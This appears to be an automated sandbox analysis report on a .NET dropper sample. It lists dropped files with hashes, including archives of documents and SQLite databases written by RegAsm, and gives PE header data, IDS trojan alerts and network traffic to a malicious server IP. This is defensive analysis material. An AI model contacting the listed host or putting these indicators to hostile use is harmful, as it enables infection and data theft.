                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicK
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):1720
                                                                                        Entropy (8bit):5.341164372684907
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHDJHoHKKHKdHKBqHKs:Pq5qXEwCYqhQnoPtIxHeqzNVIqKqdq4v
                                                                                        MD5:EF1F211A007660EF4B58A4B249FCA17B
                                                                                        SHA1:343D1C884F8F235B52E4A405694C18D69CC4A1F3
                                                                                        SHA-256:29FFA9E6E3BFB395F8FD3636D1124507329D29057F02CCCF9AD13DB16A6A04B1
                                                                                        SHA-512:88B72598ED70E7A26B00DA94AE73E682AD421BBEAE0B5D318F15C778BEA274CAD06EEC3C3056B3799082C23F47BFEC75D7020BD0D43F8F7A76F52F3ADF245CA9
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5829
                                                                                        Entropy (8bit):4.8968676994158
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                        MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                        SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                        SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                        SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16520
                                                                                        Entropy (8bit):5.20475272414696
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:nte/aFEz3LJ7TnEwcAMo/nUcmnudlum2P:jFElELALnbmudlL2
                                                                                        MD5:DD18CE2E5568AD30BF58A151F1930838
                                                                                        SHA1:A340BC9B219AD300CFFA14EDD723EB9A7B458B14
                                                                                        SHA-256:99652F4CD5A2D26EEBE0CA02608FB0981E9AE4CD6541EE919AAEF378E6D2BEB9
                                                                                        SHA-512:65C813A7CC27DF6BD5E88C1E4CDE0FC0CC189196877379E0E67CDBBC350B2036C0158C8E55E00423E72E2BC5CDA32C96409E5022D2A29E0A3199DF6F0FAE24D5
                                                                                        Malicious:false
                                                                                        Preview:@...e...............................:.7..............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:Zip archive data (empty)
                                                                                        Category:dropped
                                                                                        Size (bytes):22
                                                                                        Entropy (8bit):1.0476747992754052
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:pjt/l:Nt
                                                                                        MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                        SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                        SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                        SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                        Malicious:false
                                                                                        Preview:PK....................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):13484
                                                                                        Entropy (8bit):7.779603538008177
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:5mVbRAuzxhmVbRAuzxYX8aKVuzxhmVbRAuzxhmVbRAuzxYX8aKVuzxGz9:5OAuzrOAuzBaiuzrOAuzrOAuzBaiuz2
                                                                                        MD5:C28913FA838705C12F641433B234E5C7
                                                                                        SHA1:9175697E8341D0F78A751ACD787C9C899E2C6F25
                                                                                        SHA-256:A14D6433AB978474A515A0AE70690F281DE0FC12423F65E6B5EC31988EFB7083
                                                                                        SHA-512:80E18086C354ADBEB695865A411EEFA049FBE6237FA126C79C76A5C340BF958FDD5431BA64243C6CA3EC71642E17A06D3E6B7EF50FE9ED2C6E3BD045C45595C3
                                                                                        Malicious:false
                                                                                        Preview:PK.........t.UR..............AQRFEVRTGL.docx..Gn@1.D..r(W.m0.........f...;!.B........u-..B:.....z.%2.0...w+..{.\q../..%..9..~K....fOMw./..uLT$_..4q.....w.=.r.Y.@......sE...,.!'QG..).y`..YSi....T...|J..\.b..;.4.Z...|.&.G...b..Iz....q6:.Y..&.c}..1.|......\@.....C..r<.E/W.Y.Hc....i.V....N..f.P.<seW...d..>s...B...BA.&..%..7e....p.Tkj.o.4.k..D*<>5@..}v9.Ur...aa..Q2...7w=...W^.,...&.J...'...u8...J....$..D._....jK].vn-.\.v}.e.p_=GO.l....n..v.hZ..{.#..J5......n.R.|..n.Q.J?_..R.t....8......Q.-..3.q.O^.I.i{.RA,D{..e..W....Y.h......,.l4ub...b...(<_.........~..r........C.s|........Jn8..`.-...6i.C?.>...PR..T.T.../i\...8....XQT.e?..!.X.$G.{~..ZZ....L....4....9......?PK.........t.U../.............HMPPSXQPQV.docx..G.@!...S5.........d.-....e.+.yG<v.t..........x.dX.|.......)..e...,X:f.e.,..A.1.R.M.L.}.W.hG+L..v.C..JJ./...0[.0....#.9R.-...z.]....h.@...%..y.)...58.W.c.P.a.p...X..1I..;.*7.`}+T...%.u...,#|7.w.Pf.....98..!.6.,.A.b.V.8.j$l.X.a....7..P.......st.....n
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):8192
                                                                                        Entropy (8bit):4.8644449221723445
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:WKeCtTNUT/09Lu/qmJQ9UkL7LoLJ5hPHf+ND:WKxNUTc9Lu/pJQykL7LoLhf+N
                                                                                        MD5:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        SHA1:B7C51EC181C8751F752E14DBA96132A83EEAA7A8
                                                                                        SHA-256:CB05606B742226130A4E421B47B04BEE21B4DA79BB883C15A3C6A9002D8DFA7D
                                                                                        SHA-512:1645BBFD918C73B7578E0EEF6369C71F88C147391EB5E32A2CEF7E8171F88008689602DA8EB29EDF051119DC01174A0C84D8BB2D464B087DB769335DC8DCD926
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: Virustotal, Detection: 22%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.................0..............5... ...@....@.. ....................................`..................................4..O....@..\....................`.......4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc.......`......................@..B.................4......H........#..............03..p...........................................b.(.....(....(....(....&*z.,..{....,..{....o......(....*.0..U........(....."..0A"...As....(......(..... .... ....s....(.....r...p(.....r...po......(....*Z(.....(....s....( ...*..(!...*6.(.....(....*Rs....&(.....{....,.*z.,..{....,..{....o......(....*...0..g........(....."..0A"...As....(......(..... .... X...s....(.....r...p(.....r...po............s"...(#.....(....*..0.._.......($...o%...(...+..o'...-.*.o(
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):4.8644449221723445
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File size:8192
                                                                                        MD5:a93394c0d7a32e0ae2ba43a6fd881301
                                                                                        SHA1:b7c51ec181c8751f752e14dba96132a83eeaa7a8
                                                                                        SHA256:cb05606b742226130a4e421b47b04bee21b4da79bb883c15a3c6a9002d8dfa7d
                                                                                        SHA512:1645bbfd918c73b7578e0eef6369c71f88c147391eb5e32a2cef7e8171f88008689602da8eb29edf051119dc01174a0c84d8bb2d464b087db769335dc8dcd926
                                                                                        SSDEEP:192:WKeCtTNUT/09Lu/qmJQ9UkL7LoLJ5hPHf+ND:WKxNUTc9Lu/pJQykL7LoLhf+N
                                                                                        TLSH:1EF1F823E3A85333C66E0F799C53938063BD9327992BCB5F88C5521F5E533210A53BA9
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.................0..............5... ...@....@.. ....................................`................................
                                                                                        Icon Hash:00828e8e8686b000
                                                                                        Entrypoint:0x40350e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xC1D21F41 [Mon Jan 16 06:20:49 2073 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x34bc0x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x55c.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x34a00x1c.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x15140x1600False0.5262784090909091SysEx File -5.433968712862039IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x40000x55c0x600False0.3977864583333333data3.913499305668389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x60000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountry
                                                                                        RT_VERSION0x40900x2ccdata
                                                                                        RT_MANIFEST0x436c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain
                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        41.216.183.235192.168.2.380496992012252 10/14/22-00:42:30.686053TCP2012252ET SHELLCODE Common 0a0a0a0a Heap Spray String804969941.216.183.235192.168.2.3
                                                                                        41.216.183.235192.168.2.380496992017962 10/14/22-00:42:30.034188TCP2017962ET TROJAN PE EXE or DLL Windows file download disguised as ASCII804969941.216.183.235192.168.2.3
                                                                                        192.168.2.341.216.183.23549699802034631 10/14/22-00:42:29.991059TCP2034631ET TROJAN Maldoc Activity (set)4969980192.168.2.341.216.183.235
                                                                                        41.216.183.235192.168.2.380497002022640 10/14/22-00:44:33.586734TCP2022640ET TROJAN PE EXE or DLL Windows file download Text M2804970041.216.183.235192.168.2.3
                                                                                        192.168.2.341.216.183.23549700802034631 10/14/22-00:44:33.554000TCP2034631ET TROJAN Maldoc Activity (set)4970080192.168.2.341.216.183.235
                                                                                        192.168.2.341.216.183.23549701802034631 10/14/22-00:44:48.157973TCP2034631ET TROJAN Maldoc Activity (set)4970180192.168.2.341.216.183.235
                                                                                        41.216.183.235192.168.2.380497002012252 10/14/22-00:44:33.870351TCP2012252ET SHELLCODE Common 0a0a0a0a Heap Spray String804970041.216.183.235192.168.2.3
                                                                                        41.216.183.235192.168.2.380496992022640 10/14/22-00:42:30.034188TCP2022640ET TROJAN PE EXE or DLL Windows file download Text M2804969941.216.183.235192.168.2.3
                                                                                        41.216.183.235192.168.2.380497002017962 10/14/22-00:44:33.586734TCP2017962ET TROJAN PE EXE or DLL Windows file download disguised as ASCII804970041.216.183.235192.168.2.3
                                                                                        41.216.183.235192.168.2.380497012017962 10/14/22-00:44:48.194634TCP2017962ET TROJAN PE EXE or DLL Windows file download disguised as ASCII804970141.216.183.235192.168.2.3
                                                                                        41.216.183.235192.168.2.380497012022640 10/14/22-00:44:48.194634TCP2022640ET TROJAN PE EXE or DLL Windows file download Text M2804970141.216.183.235192.168.2.3
                                                                                        41.216.183.235192.168.2.380497012012252 10/14/22-00:44:48.589687TCP2012252ET SHELLCODE Common 0a0a0a0a Heap Spray String804970141.216.183.235192.168.2.3
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 14, 2022 00:42:29.960601091 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:29.989819050 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:29.990046024 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:29.991059065 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034188032 CEST804969941.216.183.235192.168.2.3
